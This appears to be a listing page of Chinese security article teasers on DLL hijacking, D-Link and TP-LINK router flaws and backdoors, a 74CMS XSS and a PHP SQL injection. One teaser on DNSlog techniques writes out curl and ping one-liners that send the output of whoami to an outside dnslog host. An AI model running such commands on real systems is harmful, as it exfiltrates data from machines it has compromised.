本文根据广东靓仔个人技术笔记整理1. DLL劫持通常情况下程序可以指定在运行时加载的DLL(Dynamic link Library,动态连接库)。不正确或模糊地指定所需DLL的程序可能会打...
对两个D-Link路由器身份验证绕过漏洞的分析
今年2月,D-Link发布了 针对两个身份验证绕过漏洞CVE-2020-8863 和 CVE-2020-8864的固件 补丁程序,这些漏洞 影响了D-Link DIR-882,DIR-878和DIR-...
D-Link摄像头在野0-Day漏洞分析报告
本报告由CNCERT物联网安全研究团队与360网络安全研究院共同发布一、背景介绍2020年7月4号,CNCERT物联网安全研究团队与360网络安全研究院共同分析,监测到有攻击者使用D-Link摄像头2...
D-Link 5个安全漏洞
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵...
骑士人才(74CMS)3.X通杀XSS
Author:毒药 这个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。
TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门
网上乱逛看到的内容,转了过来,做个记录……TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门,TPLINK WR941N V2_090803 路由器 后门,T...
易想购物link.php sql注入漏洞
易想团购系统link.php页面内代码[php]if($_REQUEST['act']=='go') //link标签 go { $url = ($_REQUEST['url'])...
DNSlog攻击技巧
linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换...
D-Link Dir-850L 远程命令执行漏洞(漏洞分析)
D-Link Dir-850L 路由器的固件可以从官方下载获取,这里下载1.14.B07版本的固件,地址: ftp://ftp2.dlink.com/PRODUCTS/DIR-85...
D-Link DIR-890L 固件分析
之前的6个月,D-Link都不断使坏,把我整的晕头转向。今天我想找些乐子,登陆他们的网站,结果就看到了惨不忍睹的一幕: 这个路由器上运行的固件有很多bug,而最变态的地方在于,它居...
11